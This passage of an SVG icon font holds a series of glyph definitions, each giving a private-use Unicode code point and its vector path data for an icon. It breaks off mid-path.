<glyph unicode="&#xf1d2;" d="M582 228q0 -66 -93 -66q-107 0 -107 63q0 64 98 64q102 0 102 -61zM546 694q0 -85 -74 -85q-77 0 -77 84q0 90 77 90q36 0 55 -25.5t19 -63.5zM712 769v125q-78 -29 -135 -29q-50 29 -110 29q-86 0 -145 -57t-59 -143q0 -50 29.5 -102t73.5 -67v-3q-38 -17 -38 -85 q0 -53 41 -77v-3q-113 -37 -113 -139q0 -45 20 -78.5t54 -51t72 -25.5t81 -8q224 0 224 188q0 67 -48 99t-126 46q-27 5 -51.5 20.5t-24.5 39.5q0 44 49 52q77 15 122 70t45 134q0 24 -10 52q37 9 49 13zM771 350h137q-2 27 -2 82v387q0 46 2 69h-137q3 -23 3 -71v-392 q0 -50 -3 -75zM1280 366v121q-30 -21 -68 -21q-53 0 -53 82v225h52q9 0 26.5 -1t26.5 -1v117h-105q0 82 3 102h-140q4 -24 4 -55v-47h-60v-117q36 3 37 3q3 0 11 -0.5t12 -0.5v-2h-2v-217q0 -37 2.5 -64t11.5 -56.5t24.5 -48.5t43.5 -31t66 -12q64 0 108 24zM924 1072 q0 36 -24 63.5t-60 27.5t-60.5 -27t-24.5 -64q0 -36 25 -62.5t60 -26.5t59.5 27t24.5 62zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf1d3;" horiz-adv-x="1792" d="M595 22q0 100 -165 100q-158 0 -158 -104q0 -101 172 -101q151 0 151 105zM536 777q0 61 -30 102t-89 41q-124 0 -124 -145q0 -135 124 -135q119 0 119 137zM805 1101v-202q-36 -12 -79 -22q16 -43 16 -84q0 -127 -73 -216.5t-197 -112.5q-40 -8 -59.5 -27t-19.5 -58 q0 -31 22.5 -51.5t58 -32t78.5 -22t86 -25.5t78.5 -37.5t58 -64t22.5 -98.5q0 -304 -363 -304q-69 0 -130 12.5t-116 41t-87.5 82t-32.5 127.5q0 165 182 225v4q-67 41 -67 126q0 109 63 137v4q-72 24 -119.5 108.5t-47.5 165.5q0 139 95 231.5t235 92.5q96 0 178 -47 q98 0 218 47zM1123 220h-222q4 45 4 134v609q0 94 -4 128h222q-4 -33 -4 -124v-613q0 -89 4 -134zM1724 442v-196q-71 -39 -174 -39q-62 0 -107 20t-70 50t-39.5 78t-18.5 92t-4 103v351h2v4q-7 0 -19 1t-18 1q-21 0 -59 -6v190h96v76q0 54 -6 89h227q-6 -41 -6 -165h171 v-190q-15 0 -43.5 2t-42.5 2h-85v-365q0 -131 87 -131q61 0 109 33zM1148 1389q0 -58 -39 -101.5t-96 -43.5q-58 0 -98 43.5t-40 101.5q0 59 39.5 103t98.5 44q58 0 96.5 -44.5t38.5 -102.5z" />
<glyph unicode="&#xf1d4;" d="M809 532l266 499h-112l-157 -312q-24 -48 -44 -92l-42 92l-155 312h-120l263 -493v-324h101v318zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf1d5;" horiz-adv-x="1280" d="M842 964q0 -80 -57 -136.5t-136 -56.5q-60 0 -111 35q-62 -67 -115 -146q-247 -371 -202 -859q1 -22 -12.5 -38.5t-34.5 -18.5h-5q-20 0 -35 13.5t-17 33.5q-14 126 -3.5 247.5t29.5 217t54 186t69 155.5t74 125q61 90 132 165q-16 35 -16 77q0 80 56.5 136.5t136.5 56.5 t136.5 -56.5t56.5 -136.5zM1223 953q0 -158 -78 -292t-212.5 -212t-292.5 -78q-64 0 -131 14q-21 5 -32.5 23.5t-6.5 39.5q5 20 23 31.5t39 7.5q51 -13 108 -13q97 0 186 38t153 102t102 153t38 186t-38 186t-102 153t-153 102t-186 38t-186 -38t-153 -102t-102 -153 t-38 -186q0 -114 52 -218q10 -20 3.5 -40t-25.5 -30t-39.5 -3t-30.5 26q-64 123 -64 265q0 119 46.5 227t124.5 186t186 124t226 46q158 0 292.5 -78t212.5 -212.5t78 -292.5z" />
<glyph unicode="&#xf1d6;" horiz-adv-x="1792" d="M270 730q-8 19 -8 52q0 20 11 49t24 45q-1 22 7.5 53t22.5 43q0 139 92.5 288.5t217.5 209.5q139 66 324 66q133 0 266 -55q49 -21 90 -48t71 -56t55 -68t42 -74t32.5 -84.5t25.5 -89.5t22 -98l1 -5q55 -83 55 -150q0 -14 -9 -40t-9 -38q0 -1 1.5 -3.5t3.5 -5t2 -3.5 q77 -114 120.5 -214.5t43.5 -208.5q0 -43 -19.5 -100t-55.5 -57q-9 0 -19.5 7.5t-19 17.5t-19 26t-16 26.5t-13.5 26t-9 17.5q-1 1 -3 1l-5 -4q-59 -154 -132 -223q20 -20 61.5 -38.5t69 -41.5t35.5 -65q-2 -4 -4 -16t-7 -18q-64 -97 -302 -97q-53 0 -110.5 9t-98 20 t-104.5 30q-15 5 -23 7q-14 4 -46 4.5t-40 1.5q-41 -45 -127.5 -65t-168.5 -20q-35 0 -69 1.5t-93 9t-101 20.5t-74.5 40t-32.5 64q0 40 10 59.5t41 48.5q11 2 40.5 13t49.5 12q4 0 14 2q2 2 2 4l-2 3q-48 11 -108 105.5t-73 156.5l-5 3q-4 0 -12 -20q-18 -41 -54.5 -74.5 t-77.5 -37.5h-1q-4 0 -6 4.5t-5 5.5q-23 54 -23 100q0 275 252 466z" />
<glyph unicode="&#xf1d7;" horiz-adv-x="2048" d="M580 1075q0 41 -25 66t-66 25q-43 0 -76 -25.5t-33 -65.5q0 -39 33 -64.5t76 -25.5q41 0 66 24.5t25 65.5zM1323 568q0 28 -25.5 50t-65.5 22q-27 0 -49.5 -22.5t-22.5 -49.5q0 -28 22.5 -50.5t49.5 -22.5q40 0 65.5 22t25.5 51zM1087 1075q0 41 -24.5 66t-65.5 25 q-43 0 -76 -25.5t-33 -65.5q0 -39 33 -64.5t76 -25.5q41 0 65.5 24.5t24.5 65.5zM1722 568q0 28 -26 50t-65 22q-27 0 -49.5 -22.5t-22.5 -49.5q0 -28 22.5 -50.5t49.5 -22.5q39 0 65 22t26 51zM1456 965q-31 4 -70 4q-169 0 -311 -77t-223.5 -208.5t-81.5 -287.5 q0 -78 23 -152q-35 -3 -68 -3q-26 0 -50 1.5t-55 6.5t-44.5 7t-54.5 10.5t-50 10.5l-253 -127l72 218q-290 203 -290 490q0 169 97.5 311t264 223.5t363.5 81.5q176 0 332.5 -66t262 -182.5t136.5 -260.5zM2048 404q0 -117 -68.5 -223.5t-185.5 -193.5l55 -181l-199 109 q-150 -37 -218 -37q-169 0 -311 70.5t-223.5 191.5t-81.5 264t81.5 264t223.5 191.5t311 70.5q161 0 303 -70.5t227.5 -192t85.5 -263.5z" />
<glyph unicode="&#xf1d8;" horiz-adv-x="1792" d="M1764 1525q33 -24 27 -64l-256 -1536q-5 -29 -32 -45q-14 -8 -31 -8q-11 0 -24 5l-453 185l-242 -295q-18 -23 -49 -23q-13 0 -22 4q-19 7 -30.5 23.5t-11.5 36.5v349l864 1059l-1069 -925l-395 162q-37 14 -40 55q-2 40 32 59l1664 960q15 9 32 9q20 0 36 -11z" />
<glyph unicode="&#xf1d9;" horiz-adv-x="1792" d="M1764 1525q33 -24 27 -64l-256 -1536q-5 -29 -32 -45q-14 -8 -31 -8q-11 0 -24 5l-527 215l-298 -327q-18 -21 -47 -21q-14 0 -23 4q-19 7 -30 23.5t-11 36.5v452l-472 193q-37 14 -40 55q-3 39 32 59l1664 960q35 21 68 -2zM1422 26l221 1323l-1434 -827l336 -137 l863 639l-478 -797z" />
<glyph unicode="&#xf1da;" d="M1536 640q0 -156 -61 -298t-164 -245t-245 -164t-298 -61q-172 0 -327 72.5t-264 204.5q-7 10 -6.5 22.5t8.5 20.5l137 138q10 9 25 9q16 -2 23 -12q73 -95 179 -147t225 -52q104 0 198.5 40.5t163.5 109.5t109.5 163.5t40.5 198.5t-40.5 198.5t-109.5 163.5 t-163.5 109.5t-198.5 40.5q-98 0 -188 -35.5t-160 -101.5l137 -138q31 -30 14 -69q-17 -40 -59 -40h-448q-26 0 -45 19t-19 45v448q0 42 40 59q39 17 69 -14l130 -129q107 101 244.5 156.5t284.5 55.5q156 0 298 -61t245 -164t164 -245t61 -298zM896 928v-448q0 -14 -9 -23 t-23 -9h-320q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h224v352q0 14 9 23t23 9h64q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf1db;" d="M768 1280q-130 0 -248.5 -51t-204 -136.5t-136.5 -204t-51 -248.5t51 -248.5t136.5 -204t204 -136.5t248.5 -51t248.5 51t204 136.5t136.5 204t51 248.5t-51 248.5t-136.5 204t-204 136.5t-248.5 51zM1536 640q0 -209 -103 -385.5t-279.5 -279.5t-385.5 -103t-385.5 103 t-279.5 279.5t-103 385.5t103 385.5t279.5 279.5t385.5 103t385.5 -103t279.5 -279.5t103 -385.5z" />
<glyph unicode="&#xf1dc;" horiz-adv-x="1792" d="M1682 -128q-44 0 -132.5 3.5t-133.5 3.5q-44 0 -132 -3.5t-132 -3.5q-24 0 -37 20.5t-13 45.5q0 31 17 46t39 17t51 7t45 15q33 21 33 140l-1 391q0 21 -1 31q-13 4 -50 4h-675q-38 0 -51 -4q-1 -10 -1 -31l-1 -371q0 -142 37 -164q16 -10 48 -13t57 -3.5t45 -15 t20 -45.5q0 -26 -12.5 -48t-36.5 -22q-47 0 -139.5 3.5t-138.5 3.5q-43 0 -128 -3.5t-127 -3.5q-23 0 -35.5 21t-12.5 45q0 30 15.5 45t36 17.5t47.5 7.5t42 15q33 23 33 143l-1 57v813q0 3 0.5 26t0 36.5t-1.5 38.5t-3.5 42t-6.5 36.5t-11 31.5t-16 18q-15 10 -45 12t-53 2 t-41 14t-18 45q0 26 12 48t36 22q46 0 138.5 -3.5t138.5 -3.5q42 0 126.5 3.5t126.5 3.5q25 0 37.5 -22t12.5 -48q0 -30 -17 -43.5t-38.5 -14.5t-49.5 -4t-43 -13q-35 -21 -35 -160l1 -320q0 -21 1 -32q13 -3 39 -3h699q25 0 38 3q1 11 1 32l1 320q0 139 -35 160 q-18 11 -58.5 12.5t-66 13t-25.5 49.5q0 26 12.5 48t37.5 22q44 0 132 -3.5t132 -3.5q43 0 129 3.5t129 3.5q25 0 37.5 -22t12.5 -48q0 -30 -17.5 -44t-40 -14.5t-51.5 -3t-44 -12.5q-35 -23 -35 -161l1 -943q0 -119 34 -140q16 -10 46 -13.5t53.5 -4.5t41.5 -15.5t18 -44.5 q0 -26 -12 -48t-36 -22z" />
<glyph unicode="&#xf1dd;" horiz-adv-x="1280" d="M1278 1347v-73q0 -29 -18.5 -61t-42.5 -32q-50 0 -54 -1q-26 -6 -32 -31q-3 -11 -3 -64v-1152q0 -25 -18 -43t-43 -18h-108q-25 0 -43 18t-18 43v1218h-143v-1218q0 -25 -17.5 -43t-43.5 -18h-108q-26 0 -43.5 18t-17.5 43v496q-147 12 -245 59q-126 58 -192 179 q-64 117 -64 259q0 166 88 286q88 118 209 159q111 37 417 37h479q25 0 43 -18t18 -43z" />
<glyph unicode="&#xf1de;" d="M352 128v-128h-352v128h352zM704 256q26 0 45 -19t19 -45v-256q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h256zM864 640v-128h-864v128h864zM224 1152v-128h-224v128h224zM1536 128v-128h-736v128h736zM576 1280q26 0 45 -19t19 -45v-256 q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h256zM1216 768q26 0 45 -19t19 -45v-256q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h256zM1536 640v-128h-224v128h224zM1536 1152v-128h-864v128h864z" />
<glyph unicode="&#xf1e0;" d="M1216 512q133 0 226.5 -93.5t93.5 -226.5t-93.5 -226.5t-226.5 -93.5t-226.5 93.5t-93.5 226.5q0 12 2 34l-360 180q-92 -86 -218 -86q-133 0 -226.5 93.5t-93.5 226.5t93.5 226.5t226.5 93.5q126 0 218 -86l360 180q-2 22 -2 34q0 133 93.5 226.5t226.5 93.5 t226.5 -93.5t93.5 -226.5t-93.5 -226.5t-226.5 -93.5q-126 0 -218 86l-360 -180q2 -22 2 -34t-2 -34l360 -180q92 86 218 86z" />
<glyph unicode="&#xf1e1;" d="M1280 341q0 88 -62.5 151t-150.5 63q-84 0 -145 -58l-241 120q2 16 2 23t-2 23l241 120q61 -58 145 -58q88 0 150.5 63t62.5 151t-62.5 150.5t-150.5 62.5t-151 -62.5t-63 -150.5q0 -7 2 -23l-241 -120q-62 57 -145 57q-88 0 -150.5 -62.5t-62.5 -150.5t62.5 -150.5 t150.5 -62.5q83 0 145 57l241 -120q-2 -16 -2 -23q0 -88 63 -150.5t151 -62.5t150.5 62.5t62.5 150.5zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
<glyph unicode="&#xf1e2;" horiz-adv-x="1792" d="M571 947q-10 25 -34 35t-49 0q-108 -44 -191 -127t-127 -191q-10 -25 0 -49t35 -34q13 -5 24 -5q42 0 60 40q34 84 98.5 148.5t148.5 98.5q25 11 35 35t0 49zM1513 1303l46 -46l-244 -243l68 -68q19 -19 19 -45.5t-19 -45.5l-64 -64q89 -161 89 -343q0 -143 -55.5 -273.5 t-150 -225t-225 -150t-273.5 -55.5t-273.5 55.5t-225 150t-150 225t-55.5 273.5t55.5 273.5t150 225t225 150t273.5 55.5q182 0 343 -89l64 64q19 19 45.5 19t45.5 -19l68 -68zM1521 1359q-10 -10 -22 -10q-13 0 -23 10l-91 90q-9 10 -9 23t9 23q10 9 23 9t23 -9l90 -91 q10 -9 10 -22.5t-10 -22.5zM1751 1129q-11 -9 -23 -9t-23 9l-90 91q-10 9 -10 22.5t10 22.5q9 10 22.5 10t22.5 -10l91 -90q9 -10 9 -23t-9 -23zM1792 1312q0 -14 -9 -23t-23 -9h-96q-14 0 -23 9t-9 23t9 23t23 9h96q14 0 23 -9t9 -23zM1600 1504v-96q0 -14 -9 -23t-23 -9 t-23 9t-9 23v96q0 14 9 23t23 9t23 -9t9 -23zM1751 1449l-91 -90q-10 -10 -22 -10q-13 0 -23 10q-10 9 -10 22.5t10 22.5l90 91q10 9 23 9t23 -9q9 -10 9 -23t-9 -23z" />
<glyph unicode="&#xf1e3;" horiz-adv-x="1792" d="M609 720l287 208l287 -208l-109 -336h-355zM896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71zM1515 186q149 203 149 454v3l-102 -89l-240 224l63 323 l134 -12q-150 206 -389 282l53 -124l-287 -159l-287 159l53 124q-239 -76 -389 -282l135 12l62 -323l-240 -224l-102 89v-3q0 -251 149 -454l30 132l326 -40l139 -298l-116 -69q117 -39 240 -39t240 39l-116 69l139 298l326 40z" />
<glyph unicode="&#xf1e4;" horiz-adv-x="1792" d="M448 224v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM256 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM832 224v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23 v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM640 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM66 768q-28 0 -47 19t-19 46v129h514v-129q0 -27 -19 -46t-46 -19h-383zM1216 224v-192q0 -14 -9 -23t-23 -9h-192 q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1024 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1600 224v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23 zM1408 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1792 1016v-13h-514v10q0 104 -382 102q-382 -1 -382 -102v-10h-514v13q0 17 8.5 43t34 64t65.5 75.5t110.5 76t160 67.5t224 47.5t293.5 18.5t293 -18.5t224 -47.5 t160.5 -67.5t110.5 -76t65.5 -75.5t34 -64t8.5 -43zM1792 608v-192q0 -14 -9 -23t-23 -9h-192q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h192q14 0 23 -9t9 -23zM1792 962v-129q0 -27 -19 -46t-46 -19h-384q-27 0 -46 19t-19 46v129h514z" />
<glyph unicode="&#xf1e5;" horiz-adv-x="1792" d="M704 1216v-768q0 -26 -19 -45t-45 -19v-576q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v512l249 873q7 23 31 23h424zM1024 1216v-704h-256v704h256zM1792 320v-512q0 -26 -19 -45t-45 -19h-512q-26 0 -45 19t-19 45v576q-26 0 -45 19t-19 45v768h424q24 0 31 -23z M736 1504v-224h-352v224q0 14 9 23t23 9h288q14 0 23 -9t9 -23zM1408 1504v-224h-352v224q0 14 9 23t23 9h288q14 0 23 -9t9 -23z" />
<glyph unicode="&#xf1e6;" horiz-adv-x="1792" d="M1755 1083q37 -37 37 -90t-37 -91l-401 -400l150 -150l-160 -160q-163 -163 -389.5 -186.5t-411.5 100.5l-362 -362h-181v181l362 362q-124 185 -100.5 411.5t186.5 389.5l160 160l150 -150l400 401q38 37 91 37t90 -37t37 -90.5t-37 -90.5l-400 -401l234 -234l401 400 q38 37 91 37t90 -37z" />
<glyph unicode="&#xf1e7;" horiz-adv-x="1792" d="M873 796q0 -83 -63.5 -142.5t-152.5 -59.5t-152.5 59.5t-63.5 142.5q0 84 63.5 143t152.5 59t152.5 -59t63.5 -143zM1375 796q0 -83 -63 -142.5t-153 -59.5q-89 0 -152.5 59.5t-63.5 142.5q0 84 63.5 143t152.5 59q90 0 153 -59t63 -143zM1600 616v667q0 87 -32 123.5 t-111 36.5h-1112q-83 0 -112.5 -34t-29.5 -126v-673q43 -23 88.5 -40t81 -28t81 -18.5t71 -11t70 -4t58.5 -0.5t56.5 2t44.5 2q68 1 95 -27q6 -6 10 -9q26 -25 61 -51q7 91 118 87q5 0 36.5 -1.5t43 -2t45.5 -1t53 1t54.5 4.5t61 8.5t62 13.5t67 19.5t67.5 27t72 34.5z M1763 621q-121 -149 -372 -252q84 -285 -23 -465q-66 -113 -183 -148q-104 -32 -182 15q-86 51 -82 164l-1 326v1q-8 2 -24.5 6t-23.5 5l-1 -338q4 -114 -83 -164q-79 -47 -183 -15q-117 36 -182 150q-105 180 -22 463q-251 103 -372 252q-25 37 -4 63t60 -1q3 -2 11 -7 t11 -8v694q0 72 47 123t114 51h1257q67 0 114 -51t47 -123v-694l21 15q39 27 60 1t-4 -63z" />
<glyph unicode="&#xf1e8;" horiz-adv-x="1792" d="M896 1102v-434h-145v434h145zM1294 1102v-434h-145v434h145zM1294 342l253 254v795h-1194v-1049h326v-217l217 217h398zM1692 1536v-1013l-434 -434h-326l-217 -217h-217v217h-398v1158l109 289h1483z" />
<glyph unicode="&#xf1e9;" d="M773 217v-127q-1 -292 -6 -305q-12 -32 -51 -40q-54 -9 -181.5 38t-162.5 89q-13 15 -17 36q-1 12 4 26q4 10 34 47t181 216q1 0 60 70q15 19 39.5 24.5t49.5 -3.5q24 -10 37.5 -29t12.5 -42zM624 468q-3 -55 -52 -70l-120 -39q-275 -88 -292 -88q-35 2 -54 36 q-12 25 -17 75q-8 76 1 166.5t30 124.5t56 32q13 0 202 -77q70 -29 115 -47l84 -34q23 -9 35.5 -30.5t11.5 -48.5zM1450 171q-7 -54 -91.5 -161t-135.5 -127q-37 -14 -63 7q-14 10 -184 287l-47 77q-14 21 -11.5 46t19.5 46q35 43 83 26q1 -1 119 -40q203 -66 242 -79.5 t47 -20.5q28 -22 22 -61zM778 803q5 -102 -54 -122q-58 -17 -114 71l-378 598q-8 35 19 62q41 43 207.5 89.5t224.5 31.5q40 -10 49 -45q3 -18 22 -305.5t24 -379.5zM1440 695q3 -39 -26 -59q-15 -10 -329 -86q-67 -15 -91 -23l1 2q-23 -6 -46 4t-37 32q-30 47 0 87 q1 1 75 102q125 171 150 204t34 39q28 19 65 2q48 -23 123 -133.5t81 -167.5v-3z" />
<glyph unicode="&#xf1ea;" horiz-adv-x="2048" d="M1024 1024h-384v-384h384v384zM1152 384v-128h-640v128h640zM1152 1152v-640h-640v640h640zM1792 384v-128h-512v128h512zM1792 640v-128h-512v128h512zM1792 896v-128h-512v128h512zM1792 1152v-128h-512v128h512zM256 192v960h-128v-960q0 -26 19 -45t45 -19t45 19 t19 45zM1920 192v1088h-1536v-1088q0 -33 -11 -64h1483q26 0 45 19t19 45zM2048 1408v-1216q0 -80 -56 -136t-136 -56h-1664q-80 0 -136 56t-56 136v1088h256v128h1792z" />
<glyph unicode="&#xf1eb;" horiz-adv-x="2048" d="M1024 13q-20 0 -93 73.5t-73 93.5q0 32 62.5 54t103.5 22t103.5 -22t62.5 -54q0 -20 -73 -93.5t-93 -73.5zM1294 284q-2 0 -40 25t-101.5 50t-128.5 25t-128.5 -25t-101 -50t-40.5 -25q-18 0 -93.5 75t-75.5 93q0 13 10 23q78 77 196 121t233 44t233 -44t196 -121 q10 -10 10 -23q0 -18 -75.5 -93t-93.5 -75zM1567 556q-11 0 -23 8q-136 105 -252 154.5t-268 49.5q-85 0 -170.5 -22t-149 -53t-113.5 -62t-79 -53t-31 -22q-17 0 -92 75t-75 93q0 12 10 22q132 132 320 205t380 73t380 -73t320 -205q10 -10 10 -22q0 -18 -75 -93t-92 -75z M1838 827q-11 0 -22 9q-179 157 -371.5 236.5t-420.5 79.5t-420.5 -79.5t-371.5 -236.5q-11 -9 -22 -9q-17 0 -92.5 75t-75.5 93q0 13 10 23q187 186 445 288t527 102t527 -102t445 -288q10 -10 10 -23q0 -18 -75.5 -93t-92.5 -75z" />
<glyph unicode="&#xf1ec;" horiz-adv-x="1792" d="M384 0q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM768 0q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM384 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5 t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1152 0q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM768 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5 t37.5 90.5zM384 768q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1152 384q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM768 768q0 53 -37.5 90.5t-90.5 37.5 t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1536 0v384q0 52 -38 90t-90 38t-90 -38t-38 -90v-384q0 -52 38 -90t90 -38t90 38t38 90zM1152 768q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5z M1536 1088v256q0 26 -19 45t-45 19h-1280q-26 0 -45 -19t-19 -45v-256q0 -26 19 -45t45 -19h1280q26 0 45 19t19 45zM1536 768q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1664 1408v-1536q0 -52 -38 -90t-90 -38 h-1408q-52 0 -90 38t-38 90v1536q0 52 38 90t90 38h1408q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf1ed;" d="M1519 890q18 -84 -4 -204q-87 -444 -565 -444h-44q-25 0 -44 -16.5t-24 -42.5l-4 -19l-55 -346l-2 -15q-5 -26 -24.5 -42.5t-44.5 -16.5h-251q-21 0 -33 15t-9 36q9 56 26.5 168t26.5 168t27 167.5t27 167.5q5 37 43 37h131q133 -2 236 21q175 39 287 144q102 95 155 246 q24 70 35 133q1 6 2.5 7.5t3.5 1t6 -3.5q79 -59 98 -162zM1347 1172q0 -107 -46 -236q-80 -233 -302 -315q-113 -40 -252 -42q0 -1 -90 -1l-90 1q-100 0 -118 -96q-2 -8 -85 -530q-1 -10 -12 -10h-295q-22 0 -36.5 16.5t-11.5 38.5l232 1471q5 29 27.5 48t51.5 19h598 q34 0 97.5 -13t111.5 -32q107 -41 163.5 -123t56.5 -196z" />
<glyph unicode="&#xf1ee;" horiz-adv-x="1792" d="M602 949q19 -61 31 -123.5t17 -141.5t-14 -159t-62 -145q-21 81 -67 157t-95.5 127t-99 90.5t-78.5 57.5t-33 19q-62 34 -81.5 100t14.5 128t101 81.5t129 -14.5q138 -83 238 -177zM927 1236q11 -25 20.5 -46t36.5 -100.5t42.5 -150.5t25.5 -179.5t0 -205.5t-47.5 -209.5 t-105.5 -208.5q-51 -72 -138 -72q-54 0 -98 31q-57 40 -69 109t28 127q60 85 81 195t13 199.5t-32 180.5t-39 128t-22 52q-31 63 -8.5 129.5t85.5 97.5q34 17 75 17q47 0 88.5 -25t63.5 -69zM1248 567q-17 -160 -72 -311q-17 131 -63 246q25 174 -5 361q-27 178 -94 342 q114 -90 212 -211q9 -37 15 -80q26 -179 7 -347zM1520 1440q9 -17 23.5 -49.5t43.5 -117.5t50.5 -178t34 -227.5t5 -269t-47 -300t-112.5 -323.5q-22 -48 -66 -75.5t-95 -27.5q-39 0 -74 16q-67 31 -92.5 100t4.5 136q58 126 90 257.5t37.5 239.5t-3.5 213.5t-26.5 180.5 t-38.5 138.5t-32.5 90t-15.5 32.5q-34 65 -11.5 135.5t87.5 104.5q37 20 81 20q49 0 91.5 -25.5t66.5 -70.5z" />
<glyph unicode="&#xf1f0;" horiz-adv-x="2304" d="M1975 546h-138q14 37 66 179l3 9q4 10 10 26t9 26l12 -55zM531 611l-58 295q-11 54 -75 54h-268l-2 -13q311 -79 403 -336zM710 960l-162 -438l-17 89q-26 70 -85 129.5t-131 88.5l135 -510h175l261 641h-176zM849 318h166l104 642h-166zM1617 944q-69 27 -149 27 q-123 0 -201 -59t-79 -153q-1 -102 145 -174q48 -23 67 -41t19 -39q0 -30 -30 -46t-69 -16q-86 0 -156 33l-22 11l-23 -144q74 -34 185 -34q130 -1 208.5 59t80.5 160q0 106 -140 174q-49 25 -71 42t-22 38q0 22 24.5 38.5t70.5 16.5q70 1 124 -24l15 -8zM2042 960h-128 q-65 0 -87 -54l-246 -588h174l35 96h212q5 -22 20 -96h154zM2304 1280v-1280q0 -52 -38 -90t-90 -38h-2048q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h2048q52 0 90 -38t38 -90z" />
<glyph unicode="&#xf1f1;" horiz-adv-x="2304" d="M671 603h-13q-47 0 -47 -32q0 -22 20 -22q17 0 28 15t12 39zM1066 639h62v3q1 4 0.5 6.5t-1 7t-2 8t-4.5 6.5t-7.5 5t-11.5 2q-28 0 -36 -38zM1606 603h-12q-48 0 -48 -32q0 -22 20 -22q17 0 28 15t12 39zM1925 629q0 41 -30 41q-19 0 -31 -20t-12 -51q0 -42 28 -42 q20 0 32.5 20t12.5 52zM480 770h87l-44 -262h-56l32 201l-71 -201h-39l-4 200l-34 -200h-53l44 262h81l2 -163zM733 663q0 -6 -4 -42q-16 -101 -17 -113h-47l1 22q-20 -26 -58 -26q-23 0 -37.5 16t-14.5 42q0 39 26 60.5t73 21.5q14 0 23 -1q0 3 0.5 5.5t1 4.5t0.5 3 q0 20 -36 20q-29 0 -59 -10q0 4 7 48q38 11 67 11q74 0 74 -62zM889 721l-8 -49q-22 3 -41 3q-27 0 -27 -17q0 -8 4.5 -12t21.5 -11q40 -19 40 -60q0 -72 -87 -71q-34 0 -58 6q0 2 7 49q29 -8 51 -8q32 0 32 19q0 7 -4.5 11.5t-21.5 12.5q-43 20 -43 59q0 72 84 72 q30 0 50 -4zM977 721h28l-7 -52h-29q-2 -17 -6.5 -40.5t-7 -38.5t-2.5 -18q0 -16 19 -16q8 0 16 2l-8 -47q-21 -7 -40 -7q-43 0 -45 47q0 12 8 56q3 20 25 146h55zM1180 648q0 -23 -7 -52h-111q-3 -22 10 -33t38 -11q30 0 58 14l-9 -54q-30 -8 -57 -8q-95 0 -95 95 q0 55 27.5 90.5t69.5 35.5q35 0 55.5 -21t20.5 -56zM1319 722q-13 -23 -22 -62q-22 2 -31 -24t-25 -128h-56l3 14q22 130 29 199h51l-3 -33q14 21 25.5 29.5t28.5 4.5zM1506 763l-9 -57q-28 14 -50 14q-31 0 -51 -27.5t-20 -70.5q0 -30 13.5 -47t38.5 -17q21 0 48 13 l-10 -59q-28 -8 -50 -8q-45 0 -71.5 30.5t-26.5 82.5q0 70 35.5 114.5t91.5 44.5q26 0 61 -13zM1668 663q0 -18 -4 -42q-13 